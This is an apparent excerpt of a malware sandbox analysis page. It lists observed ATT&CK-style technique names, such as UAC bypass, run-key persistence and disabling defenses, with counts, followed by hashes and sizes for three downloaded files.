Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d614d08263661f317a7fb840036d7fc2
SHA18bb0aa39cbe5c6f05a7c09845575780f3307a99e
SHA256f7e2aedda6ce538eaf8194b187b56c7a216dd7dc111b99202086b4586c9cc964
SHA512f233c8abdb46f06a94fdc96a210b8815406753eca42b58cf3bd2ed98f6ca20d12a70c5136916b2f23bf13535bd41ed72293dd70d15c55e423eb1b7509d670bfa
-
Filesize
12KB
MD540d6bbad804abb45fd92a42b8aa77668
SHA1b2e9e96828e8a385ebcca22a2c1e571c7183f730
SHA2563f3c745f7dede01cbfef77fa405bbf7f27301cce8151dc29a2b75f9f086b860f
SHA512fdb8099ab48a259bdbefaad71640c5505cc56caffda50bebfa2e3d88c91df86235736e0f766ce0f50b7c43c4f0caf41ada871643a361c43f8eff2c7647a28977
-
Filesize
684B
MD585a5c13518f1f6ddefa13598b8bdef33
SHA1e65c518a0f845fd082c48d4a39682be0cf4b918c
SHA2565712a2a9d734d4015924c5929376850f5e4cdd63e9a05a644a670d7c8cc93546
SHA5122e73e4f009769effdbc93f1cbe81972e82627234fdd803e89d71903ec80feee33fb3fb20900b1b2dffee693a49497bf3a1e7853690c2e4392e79d46a5eb33ea2